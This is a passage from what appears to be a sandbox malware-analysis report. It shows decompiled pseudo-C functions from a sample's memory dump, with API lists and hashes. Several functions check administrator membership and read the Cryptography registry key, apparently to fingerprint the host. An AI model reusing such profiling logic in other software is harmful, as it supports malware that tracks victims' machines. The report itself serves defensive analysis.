				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E0040192D);
				if( *0x41c035 != 0) {
					_push(0x41c5b4);
					L004011D4();
					return 0;
				}
				return 0;
			}








                                                                      0x00401875
                                                                      0x00401876
                                                                      0x0040187b
                                                                      0x0040187e
                                                                      0x00401881
                                                                      0x00401886
                                                                      0x00401892
                                                                      0x00401894
                                                                      0x00401899
                                                                      0x00401899
                                                                      0x004018a3
                                                                      0x004018ad
                                                                      0x004018b7
                                                                      0x004018c3
                                                                      0x004018c8
                                                                      0x004018d4
                                                                      0x004018d6
                                                                      0x004018db
                                                                      0x004018db
                                                                      0x004018e3
                                                                      0x004018e7
                                                                      0x004018e8
                                                                      0x004018f4
                                                                      0x004018f7
                                                                      0x004018f9
                                                                      0x004018fe
                                                                      0x004018fe
                                                                      0x00401907
                                                                      0x0040190a
                                                                      0x0040190d
                                                                      0x00401919
                                                                      0x0040191b
                                                                      0x00401920
                                                                      0x00000000
                                                                      0x00401920
                                                                      0x00401925

                                                                      APIs
                                                                      • RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
                                                                      • RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
                                                                      • LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
                                                                      • RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                      • String ID:
                                                                      • API String ID: 730355536-0
                                                                      • Opcode ID: 099da0d79779097dabcbbe4e17eced4135313adf81f8614c79238fcf2f8b4282
                                                                      • Instruction ID: 5328ea8a61f1b3c3886908a4d7eb6976bfaff4b38786c7c23389d9dab3a387f7
                                                                      • Opcode Fuzzy Hash: 099da0d79779097dabcbbe4e17eced4135313adf81f8614c79238fcf2f8b4282
                                                                      • Instruction Fuzzy Hash: 06015BB0684390AEE719AB6A9C967957F92D749704F05C0BFE100BA6F1CB7D5480CB1E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00407C58 Relevance: 4.6, APIs: 3, Instructions: 80COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 27%
                                                                      			E00407C58() {
				long _v8;
				short _v10;
				char _v14;
				long _v20;
				long _v24;
				void* _v28;
				union _SID_NAME_USE _v32;
				char _v36;
				char _t21;
				short _t22;
				intOrPtr _t24;
				intOrPtr* _t26;
				intOrPtr* _t42;
				void* _t44;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t56;
				intOrPtr _t57;

				_t54 = _t56;
				_t57 = _t56 + 0xffffffe0;
				_v8 = 0;
				_t21 =  *0x41b0d0; // 0x0
				_v14 = _t21;
				_t22 =  *0x41b0d4; // 0x500
				_v10 = _t22;
				_t24 =  *0x41b0cc; // 0x12
				_t26 =  *0x41b5b0; // 0x41c720
				 *((intOrPtr*)( *_t26))( &_v14, 1, _t24, 0, 0, 0, 0, 0, 0, 0,  &_v28, _t53);
				if(_v28 == 0) {
					return _v8;
				} else {
					 *[fs:eax] = _t57;
					_v20 = 0;
					_v24 = 0;
					LookupAccountSidA(0, _v28, 0,  &_v20, 0,  &_v24,  &_v32); // executed
					_t42 =  *0x41b56c; // 0x41c72c
					_t44 =  *((intOrPtr*)( *_t42))(0, _v28,  &_v36,  *[fs:eax], 0x407d16, _t54); // executed
					if(_t44 != 0) {
						_v8 = _v36;
					} else {
						_v8 = 0;
					}
					_pop(_t52);
					 *[fs:eax] = _t52;
					_push(E00407D1D);
					return FreeSid(_v28);
				}
			}






















                                                                      0x00407c59
                                                                      0x00407c5b
                                                                      0x00407c60
                                                                      0x00407c63
                                                                      0x00407c69
                                                                      0x00407c6c
                                                                      0x00407c73
                                                                      0x00407c89
                                                                      0x00407c95
                                                                      0x00407c9c
                                                                      0x00407ca2
                                                                      0x00407d23
                                                                      0x00407ca4
                                                                      0x00407caf
                                                                      0x00407cb4
                                                                      0x00407cb9
                                                                      0x00407cd9
                                                                      0x00407ce5
                                                                      0x00407cec
                                                                      0x00407cf0
                                                                      0x00407cfc
                                                                      0x00407cf2
                                                                      0x00407cf4
                                                                      0x00407cf4
                                                                      0x00407d01
                                                                      0x00407d04
                                                                      0x00407d07
                                                                      0x00407d15
                                                                      0x00407d15

                                                                      APIs
                                                                      • LookupAccountSidA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00407D16), ref: 00407CD9
                                                                      • CheckTokenMembership.KERNELBASE(00000000,00000000,?), ref: 00407CEC
                                                                      • FreeSid.ADVAPI32(00000000,00407D1D), ref: 00407D10
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AccountCheckFreeLookupMembershipToken
                                                                      • String ID:
                                                                      • API String ID: 1602037265-0
                                                                      • Opcode ID: 2fd40f1cd6d938c6e5d16d2cd6dc980c4c8d1b789cf8552ef7046a50898a570f
                                                                      • Instruction ID: 099d520652cb879bdf47a43f009fc20e3076d83f6f5b891ba4a5cda1263a2b72
                                                                      • Opcode Fuzzy Hash: 2fd40f1cd6d938c6e5d16d2cd6dc980c4c8d1b789cf8552ef7046a50898a570f
                                                                      • Instruction Fuzzy Hash: 7821A475A04209AFDB41CFA8DC51FEEB7F8EB48700F104466EA14E7290E775AA01DBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004072A0 Relevance: 4.6, APIs: 3, Instructions: 54fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 65%
                                                                      			E004072A0(char __eax, void* __ebx, char __edx) {
				char _v8;
				char _v12;
				long _v16;
				void* _t21;
				long _t24;
				void* _t37;
				intOrPtr _t41;
				void* _t44;

				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E00403980(_v12);
				_push(_t44);
				_push(0x407334);
				_push( *[fs:eax]);
				 *[fs:eax] = _t44 + 0xfffffff4;
				_t21 = CreateFileW(E00403D3C(_v8), 0xc0000000, 3, 0, 2, 0, 0); // executed
				_t37 = _t21;
				_t24 = E00403790(_v12);
				WriteFile(_t37, E004039E8( &_v12), _t24,  &_v16, 0); // executed
				FindCloseChangeNotification(_t37); // executed
				_pop(_t41);
				 *[fs:eax] = _t41;
				_push(E0040733B);
				E004034E4( &_v12);
				return E00403B80( &_v8);
			}











                                                                      0x004072a7
                                                                      0x004072aa
                                                                      0x004072b0
                                                                      0x004072b8
                                                                      0x004072bf
                                                                      0x004072c0
                                                                      0x004072c5
                                                                      0x004072c8
                                                                      0x004072ea
                                                                      0x004072ec
                                                                      0x004072f7
                                                                      0x00407307
                                                                      0x00407314
                                                                      0x00407318
                                                                      0x0040731b
                                                                      0x0040731e
                                                                      0x00407326
                                                                      0x00407333

                                                                      APIs
                                                                        • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                                                                      • CreateFileW.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000000,00000000,00000000,00407334,?,00000000), ref: 004072EA
                                                                      • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00407307
                                                                      • FindCloseChangeNotification.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00407314
                                                                        • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileString$AllocChangeCloseCreateFindFreeNotificationWrite
                                                                      • String ID:
                                                                      • API String ID: 4167747224-0
                                                                      • Opcode ID: 96112cf46e63d2d263f6c586123e846ce9d1e06681dd97ffb7b674c20077b506
                                                                      • Instruction ID: 3b510cbaec4aa3dd23b0a59a32c8df0f07f2b1188254ef1f4a9bf23c6d4a84f0
                                                                      • Opcode Fuzzy Hash: 96112cf46e63d2d263f6c586123e846ce9d1e06681dd97ffb7b674c20077b506
                                                                      • Instruction Fuzzy Hash: 4311EC70A04208BBD711EB65CC82F9EBBACEB48704F504076B914F72D1DA746E048A58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004013EC Relevance: 3.8, APIs: 3, Instructions: 45memoryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E004013EC(void* __eax, void** __ecx, void* __edx) {
				void* _t4;
				void** _t9;
				void* _t13;
				void* _t14;
				long _t16;
				void* _t17;

				_t9 = __ecx;
				_t14 = __edx;
				_t17 = __eax;
				 *(__ecx + 4) = 0x100000;
				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4); // executed
				_t13 = _t4;
				 *_t9 = _t13;
				if(_t13 == 0) {
					_t16 = _t14 + 0x0000ffff & 0xffff0000;
					_t9[1] = _t16;
					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4); // executed
					 *_t9 = _t4;
				}
				if( *_t9 != 0) {
					_t4 = E0040123C(0x41c5d4, _t9);
					if(_t4 == 0) {
						VirtualFree( *_t9, 0, 0x8000);
						 *_t9 = 0;
						return 0;
					}
				}
				return _t4;
			}









                                                                      0x004013f0
                                                                      0x004013f2
                                                                      0x004013f4
                                                                      0x004013f6
                                                                      0x0040140a
                                                                      0x0040140f
                                                                      0x00401411
                                                                      0x00401415
                                                                      0x0040141d
                                                                      0x00401423
                                                                      0x0040142f
                                                                      0x00401434
                                                                      0x00401434
                                                                      0x00401439
                                                                      0x00401442
                                                                      0x00401449
                                                                      0x00401455
                                                                      0x0040145c
                                                                      0x00000000
                                                                      0x0040145c
                                                                      0x00401449
                                                                      0x00401462

                                                                      APIs
                                                                      • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004), ref: 0040140A
                                                                      • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004), ref: 0040142F
                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004), ref: 00401455
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$Free
                                                                      • String ID:
                                                                      • API String ID: 3668210933-0
                                                                      • Opcode ID: a686f809e4acb18e9e9e7060cb6f49e88236db108dab7956c6cf6e89c84db3dc
                                                                      • Instruction ID: 45c7259c7c7f7a53f47d7ebf7c15b413a2e3392a3d77efebc7c94e45ea16ea77
                                                                      • Opcode Fuzzy Hash: a686f809e4acb18e9e9e7060cb6f49e88236db108dab7956c6cf6e89c84db3dc
                                                                      • Instruction Fuzzy Hash: 93F0C8B17403206ADB319A294C85F537AD49B4A764F144176BB08FF3DAD675580086AC
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004040F4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16memoryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 47%
                                                                      			E004040F4(signed int __eax) {
				signed char _t13;
				void* _t15;
				void* _t19;

				_t3 = __eax;
				_t15 =  *__eax;
				if(_t15 == 0) {
					return __eax;
				} else {
					_push(__eax);
					_push( *(__edx - 4) >> 1);
					L00401148(); // executed
					__edx = __edx;
					if(__eax != 0) {
						 *__edx = __eax;
						return __eax;
					}
					__eax = __eax & 0x0000007f;
					__edx =  *__esp;
					_t19 = _t15;
					_t13 = _t3 & 0x0000007f;
					if( *0x41c008 != 0) {
						 *0x41c008();
					}
					if(_t13 != 0) {
						if(_t13 <= 0x18) {
							_t1 = _t13 + 0x41b03c; // 0xd7c9c8cc
							_t13 =  *_t1;
						}
					} else {
						_t13 =  *0x41c624; // 0x0
					}
					return E004025C0(_t19);
				}
			}






                                                                      0x004040f4
                                                                      0x004040f4
                                                                      0x004040f8
                                                                      0x00404112
                                                                      0x004040fa
                                                                      0x004040fa
                                                                      0x00404100
                                                                      0x00404102
                                                                      0x00404107
                                                                      0x0040410a
                                                                      0x00404110
                                                                      0x00000000
                                                                      0x00404110
                                                                      0x00402614
                                                                      0x00402617
                                                                      0x004025ce
                                                                      0x004025d2
                                                                      0x004025dc
                                                                      0x004025e2
                                                                      0x004025e2
                                                                      0x004025ea
                                                                      0x004025f7
                                                                      0x004025fd
                                                                      0x004025fd
                                                                      0x004025fd
                                                                      0x004025ec
                                                                      0x004025ec
                                                                      0x004025ec
                                                                      0x00402610
                                                                      0x00402610

                                                                      APIs
                                                                      • SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                                                                      Strings
                                                                      • SOFTWARE\Microsoft\Cryptography, xrefs: 00404101
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocString
                                                                      • String ID: SOFTWARE\Microsoft\Cryptography
                                                                      • API String ID: 2525500382-1514646153
                                                                      • Opcode ID: 6827334effe1af4081dab58951797ab719276b71555c5be752b1280ab307ebe8
                                                                      • Instruction ID: 809722c095ea45080b132ee1ecccaea0ad8e4e48b5b2181e80121cad3d0a43f6
                                                                      • Opcode Fuzzy Hash: 6827334effe1af4081dab58951797ab719276b71555c5be752b1280ab307ebe8
                                                                      • Instruction Fuzzy Hash: E6D012F42001025AD7489F198555A37776E5BD1700368C6BEA101BF2D5DB39E841EB34
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401F5C Relevance: 3.1, APIs: 2, Instructions: 124COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00401870: RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
                                                                        • Part of subcall function 00401870: RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
                                                                        • Part of subcall function 00401870: LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
                                                                        • Part of subcall function 00401870: RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920
                                                                      • RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,004020D8), ref: 00401FA7
                                                                      • RtlLeaveCriticalSection.KERNEL32(0041C5B4,004020DF), ref: 004020D2
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                      • String ID:
                                                                      • API String ID: 2227675388-0
                                                                      • Opcode ID: 0c1c8bb305bbff8ba2aa7aa2b7d32e669c82bb45643f7d7afb35836f5abc82eb
                                                                      • Instruction ID: 60aaef5d71d1198278099ac2c9ce8b9a20775f5f033974ed56173d7c89f55220
                                                                      • Opcode Fuzzy Hash: 0c1c8bb305bbff8ba2aa7aa2b7d32e669c82bb45643f7d7afb35836f5abc82eb
                                                                      • Instruction Fuzzy Hash: DA41CDB1A813019FD714CF29DDC56AABBA1EB59318B24C27FD505E77E1E378A841CB08
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00407B78 Relevance: 3.1, APIs: 2, Instructions: 84COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000000,00407C46), ref: 00407C19
                                                                      • FreeSid.ADVAPI32(00000000,00407C4D), ref: 00407C40
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CheckFreeMembershipToken
                                                                      • String ID:
                                                                      • API String ID: 3914140973-0
                                                                      • Opcode ID: 02d2a01e1651f1c233edb1ebec011e8a64dd2af6dca5e3f4e19433a4a010ba8d
                                                                      • Instruction ID: aed4e80559fb2a14190837efd407bda22eaf0f983d9af5a1b784dce0b7ff3491
                                                                      • Opcode Fuzzy Hash: 02d2a01e1651f1c233edb1ebec011e8a64dd2af6dca5e3f4e19433a4a010ba8d
                                                                      • Instruction Fuzzy Hash: 60214F75A48388BEE701DBA8CC41FAE77FCEB09704F4084B6E610E3291D775AA098759
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00407B77 Relevance: 3.1, APIs: 2, Instructions: 80COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000000,00407C46), ref: 00407C19
                                                                      • FreeSid.ADVAPI32(00000000,00407C4D), ref: 00407C40
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CheckFreeMembershipToken
                                                                      • String ID:
                                                                      • API String ID: 3914140973-0
                                                                      • Opcode ID: 85f5b30b1e39150e1c8e346ace12111ea4b56de602e113dca3c1568075f88dab
                                                                      • Instruction ID: f84fb7a27dacd8e4143a25a8c882f6f2bfcd0e0861e01e35ab8e7fc80b6cb224
                                                                      • Opcode Fuzzy Hash: 85f5b30b1e39150e1c8e346ace12111ea4b56de602e113dca3c1568075f88dab
                                                                      • Instruction Fuzzy Hash: 0A216075A48248BEE701CBA8CC81FAE77F8EB0D704F5084B6F610E36D1D775AA058B59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00407500 Relevance: 3.1, APIs: 2, Instructions: 76registryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 55%
                                                                      			E00407500(void* __eax, void* __ebx, char __ecx, char __edx, intOrPtr _a4, char _a8) {
				char _v8;
				char _v12;
				int _v16;
				int _v20;
				void* _v24;
				char _v536;
				intOrPtr* _t43;
				intOrPtr* _t52;
				void* _t56;
				intOrPtr _t63;
				void* _t67;

				_v12 = __ecx;
				_v8 = __edx;
				_t56 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				_push(_t67);
				_push(0x4075e3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffdec;
				_v20 = 0xfe;
				_v536 = 0;
				if(_a8 != 1) {
					RegOpenKeyExW(_t56, E00403D3C(_v8), 0, 0x20019,  &_v24); // executed
				} else {
					_t52 =  *0x41b574; // 0x41c71c
					 *((intOrPtr*)( *_t52))(_t56, E00403D3C(_v8), 0, 0x20119,  &_v24);
				}
				RegQueryValueExW(_v24, E00403D3C(_v12), 0,  &_v16,  &_v536,  &_v20); // executed
				E00403D10(_a4, 0x100,  &_v536);
				_t43 =  *0x41b58c; // 0x41c718
				 *((intOrPtr*)( *_t43))(); // executed
				_t63 = _t56;
				 *[fs:eax] = _t63;
				_push(E004075EA);
				return E00403B98( &_v12, 2);
			}














                                                                      0x0040750a
                                                                      0x0040750d
                                                                      0x00407510
                                                                      0x00407515
                                                                      0x0040751d
                                                                      0x00407524
                                                                      0x00407525
                                                                      0x0040752a
                                                                      0x0040752d
                                                                      0x00407530
                                                                      0x00407537
                                                                      0x00407544
                                                                      0x00407582
                                                                      0x00407546
                                                                      0x0040755b
                                                                      0x00407562
                                                                      0x00407562
                                                                      0x004075a9
                                                                      0x004075b9
                                                                      0x004075bf
                                                                      0x004075c6
                                                                      0x004075ca
                                                                      0x004075cd
                                                                      0x004075d0
                                                                      0x004075e2

                                                                      APIs
                                                                        • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                                                                      • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,?), ref: 00407582
                                                                      • RegQueryValueExW.KERNEL32(?,00000000,00000000,00000001,00000000,000000FE), ref: 004075A9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocOpenQueryStringValue
                                                                      • String ID:
                                                                      • API String ID: 4139485348-0
                                                                      • Opcode ID: 3ed5b2ee1dba194cc6dbe336fcadb55ada54ae4c4b70a41d90ff88955bf18e37
                                                                      • Instruction ID: a534eb6d79e9af16e12b264bd48d331209bfd9d9316274433d90d6d6e5d4440a
                                                                      • Opcode Fuzzy Hash: 3ed5b2ee1dba194cc6dbe336fcadb55ada54ae4c4b70a41d90ff88955bf18e37
                                                                      • Instruction Fuzzy Hash: 1921C771A04109AFD700EB99CD81EEEBBFCEB48304F504576B904E7691D774AE448A65
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00406DA8 Relevance: 3.1, APIs: 2, Instructions: 58registryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 65%
                                                                      			E00406DA8(void* __eax, void* __ebx, char __ecx, char __edx, intOrPtr _a4) {
				char _v8;
				char _v12;
				int _v16;
				int _v20;
				void* _v24;
				char _v536;
				void* _t18;
				intOrPtr _t52;
				void* _t56;

				_t18 = __eax - 0x55000000;
				_v12 = __ecx;
				_v8 = __edx;
				E004040F4( &_v8);
				E004040F4( &_v12);
				_push(_t56);
				_push(0x406e5f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t56 + 0xfffffdec;
				_v20 = 0xfe;
				_v536 = 0;
				RegOpenKeyExW(_t18, E00403D3C(_v8), 0, 0x20119,  &_v24); // executed
				RegQueryValueExW(_v24, E00403D3C(_v12), 0,  &_v16,  &_v536,  &_v20); // executed
				E00403D10(_a4, 0x100,  &_v536);
				_pop(_t52);
				 *[fs:eax] = _t52;
				_push(E00406E66);
				return E00403B98( &_v12, 2);
			}












                                                                      0x00406da8
                                                                      0x00406db6
                                                                      0x00406db9
                                                                      0x00406dc1
                                                                      0x00406dc9
                                                                      0x00406dd0
                                                                      0x00406dd1
                                                                      0x00406dd6
                                                                      0x00406dd9
                                                                      0x00406ddc
                                                                      0x00406de3
                                                                      0x00406e08
                                                                      0x00406e2f
                                                                      0x00406e3f
                                                                      0x00406e46
                                                                      0x00406e49
                                                                      0x00406e4c
                                                                      0x00406e5e

                                                                      APIs
                                                                        • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                                                                      • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020119,?), ref: 00406E08
                                                                      • RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406E2F
                                                                        • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: String$AllocFreeOpenQueryValue
                                                                      • String ID:
                                                                      • API String ID: 967375698-0
                                                                      • Opcode ID: 42e8ac0eb481dbdee281ab6c948f954a5f7be2f1dbc7aad8dbdbf02e747b1a52
                                                                      • Instruction ID: d76901b39ac324b957afaa178e8467113ca23e905bfc9c7565385042a447591e
                                                                      • Opcode Fuzzy Hash: 42e8ac0eb481dbdee281ab6c948f954a5f7be2f1dbc7aad8dbdbf02e747b1a52
                                                                      • Instruction Fuzzy Hash: 4E110A71600209AFD700EB99C991ADEBBFCEB48304F504176B504E3291D774AF048AA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00406DAC Relevance: 3.1, APIs: 2, Instructions: 58registryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 65%
                                                                      			E00406DAC(void* __eax, void* __ebx, char __ecx, char __edx, intOrPtr _a4) {
				char _v8;
				char _v12;
				int _v16;
				int _v20;
				void* _v24;
				char _v536;
				void* _t44;
				intOrPtr _t51;
				void* _t55;

				_v12 = __ecx;
				_v8 = __edx;
				_t44 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				_push(_t55);
				_push(0x406e5f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t55 + 0xfffffdec;
				_v20 = 0xfe;
				_v536 = 0;
				RegOpenKeyExW(_t44, E00403D3C(_v8), 0, 0x20119,  &_v24); // executed
				RegQueryValueExW(_v24, E00403D3C(_v12), 0,  &_v16,  &_v536,  &_v20); // executed
				E00403D10(_a4, 0x100,  &_v536);
				_pop(_t51);
				 *[fs:eax] = _t51;
				_push(E00406E66);
				return E00403B98( &_v12, 2);
			}












                                                                      0x00406db6
                                                                      0x00406db9
                                                                      0x00406dbc
                                                                      0x00406dc1
                                                                      0x00406dc9
                                                                      0x00406dd0
                                                                      0x00406dd1
                                                                      0x00406dd6
                                                                      0x00406dd9
                                                                      0x00406ddc
                                                                      0x00406de3
                                                                      0x00406e08
                                                                      0x00406e2f
                                                                      0x00406e3f
                                                                      0x00406e46
                                                                      0x00406e49
                                                                      0x00406e4c
                                                                      0x00406e5e

                                                                      APIs
                                                                        • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                                                                      • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020119,?), ref: 00406E08
                                                                      • RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406E2F
                                                                        • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: String$AllocFreeOpenQueryValue
                                                                      • String ID:
                                                                      • API String ID: 967375698-0
                                                                      • Opcode ID: 2211f0de82845023bd4461a93eb36700242ae8860f2016ef3c98de18d7d5de81
                                                                      • Instruction ID: 82cb5f20ed390e82a860d028ca805bd23af48b7bdc57f11f8f6bbfe72b4b229b
                                                                      • Opcode Fuzzy Hash: 2211f0de82845023bd4461a93eb36700242ae8860f2016ef3c98de18d7d5de81
                                                                      • Instruction Fuzzy Hash: 0211EC75600209AFD701EB99CD81EDEBBFCEB48704F504576B504F3291DB74AF448AA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401388 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00401388(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E0040123C(0x41c5d4, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}







                                                                      0x0040138b
                                                                      0x00401395
                                                                      0x004013a4
                                                                      0x00401397
